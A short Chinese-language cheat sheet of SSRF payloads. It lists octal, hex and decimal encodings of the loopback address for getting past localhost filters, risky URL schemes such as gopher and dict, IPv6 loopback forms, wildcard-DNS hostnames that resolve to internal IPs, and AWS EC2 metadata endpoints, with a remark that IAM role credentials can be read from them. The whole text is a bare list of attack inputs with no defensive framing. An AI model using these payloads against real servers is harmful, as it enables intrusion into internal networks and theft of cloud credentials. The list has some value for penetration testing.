SSRF

http://0177.1/
http://0x7f.1/
http://127.000.000.1
https://520968996

提示: Ip段可被计算出,通过 http://www.subnetmask.info/

一些处理协议

gopher://, dict://, php://, jar://, tftp://

IPv6

http://[::1]
http://[::]

通配符 DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link:http://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link:http://nip.io

AWS EC2 元数据

http://169.254.169.254/latest/meta-data/  
http://169.254.169.254/latest/meta-data/local-hostname
http://169.254.169.254/latest/meta-data/public-hostname

如果存在与实例关联的IAM角色,则role-name是该角色的名称,role-name包含与该角色关联的临时安全凭据[…]

Link:http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (包含一个全面的实例元数据类别表)